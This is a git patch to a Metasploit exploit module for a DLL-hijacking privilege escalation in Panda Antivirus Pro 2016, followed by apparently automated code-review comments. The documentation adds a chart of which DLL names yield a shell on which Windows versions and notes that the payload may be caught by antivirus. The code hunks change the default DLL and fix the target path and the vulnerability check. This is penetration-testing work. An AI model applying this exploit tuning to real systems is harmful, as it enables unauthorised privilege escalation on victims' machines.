From 12e4fe1c5c628c17cbb842a4f18f8f62f56faecc Mon Sep 17 00:00:00 2001
From: h00die
Date: Thu, 20 Oct 2016 20:45:50 -0400
Subject: [PATCH] updated dlls and docs
---
 .../exploit/windows/local/panda_psevents.md | 21 +++++++++++++++----
 .../exploits/windows/local/panda_psevents.rb | 14 ++++++-------
 2 files changed, 24 insertions(+), 11 deletions(-)
diff --git a/documentation/modules/exploit/windows/local/panda_psevents.md b/documentation/modules/exploit/windows/local/panda_psevents.md
index 9bb2a890c5..9682d27b1e 100644
--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@@ -2,9 +2,12 @@
 Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
- The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action.
+ The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
- The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear.
+ The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
+
+ 1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
+ 2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
 ## Verification Steps
@@ -24,7 +27,17 @@
 **DLL**
- Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky. CRYPTBASE.dll seemed to work the best and is the default.
+ Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.
+
+ | | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
+ |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
+ | 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
+ | 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
+ | 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
+ | 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
+ | 32bit target (0), win7sp1 x86 | | | valid | | valid (caught by av) | |
+
+ In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell.
 **ListenerTimeout**
@@ -73,7 +86,7 @@
 Name Current Setting Required Description
 ---- --------------- -------- -----------
- DLL CRYPTBASE.dll yes dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll)
+ DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
 ListenerTimeout 3610 yes Number of seconds to wait for the exploit
 SESSION 1 yes The session to run this module on.
diff --git a/modules/exploits/windows/local/panda_psevents.rb b/modules/exploits/windows/local/panda_psevents.rb
index aca9c5bf3a..dc7f21d50b 100644
--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
 ))
 register_options(
 [
- OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll',
- ['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]),
+ OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',
+ ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),
 OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
 ], self.class)
 end
@@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local
 def get_path()
 case sysinfo['OS']
 when /Windows (7|8|10|2012|2008)/
- return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+ return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
 when /Windows (NT|XP)/
- return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+ return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
 end
 end
 def check
- directory
- if directory(get_path())
+ if directory?(get_path())
 print_good('Vuln path exists')
 CheckCode::Appears
 else
+ vprint_error("#{get_path()} doesn't exist on target")
 CheckCode::Safe
 end
 end
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status("OS Detected as: #{sysinfo['OS']}")
 payload_filepath = get_path()
- payload_filepath = "#{payload_filepath}#{datastore['DLL']}"
+ payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"
 upload_payload_dll(payload_filepath)
 # start the hour wait
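Review bot: The default for `DLL` moves from `CRYPTBASE.dll` to `cryptnet.dll` in the new `OptEnum.new` line, but the documentation hunk at `@@ -73,7 +86,7 @@` in panda_psevents.md still prints `DLL CRYPTBASE.dll yes` as the current setting, so the docs now disagree with the module; that line should read `DLL cryptnet.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)`. The new chart in the same document marks `cryptnet.dll` as "caught by av" on the win8.1 x86 and win7sp1 x86 rows while `CRYPTBASE.dll` is plain `valid` on win8.1 x86, so a short comment above the option stating why `cryptnet.dll` is nevertheless the default would help the next maintainer, e.g. `# cryptnet.dll is the only DLL marked valid on every tested target (see docs chart); CRYPTBASE.dll only works on win8.1 x86`. The enclosing `initialize` begins outside the hunk.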
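Review bot: `get_path` still returns nil for any `sysinfo['OS']` string the two `when` regexes do not match, because the `case` has no `else`, and both the new `directory?(get_path())` in `check` and the new `"#{payload_filepath}\\#{datastore['DLL']}"` in the `@@ -82,7 +82,7 @@` hunk consume that nil unguarded; the latter yields the relative path `\cryptnet.dll`, so the DLL would be uploaded somewhere other than the Panda downloads folder the module intends. I would guard both callers: in `check`, `path = get_path` followed by `return CheckCode::Unknown unless path`, and in `exploit`, `fail_with(Failure::NoTarget, "Unsupported OS: #{sysinfo['OS']}") unless payload_filepath` before the interpolation. `get_path` is also called twice on the failure branch of `check`; keeping the result in a local avoids the repeated `sysinfo` call and drops the unidiomatic empty parens on `get_path()`. The `exploit` method that contains the `@@ -82` hunk begins and ends outside it.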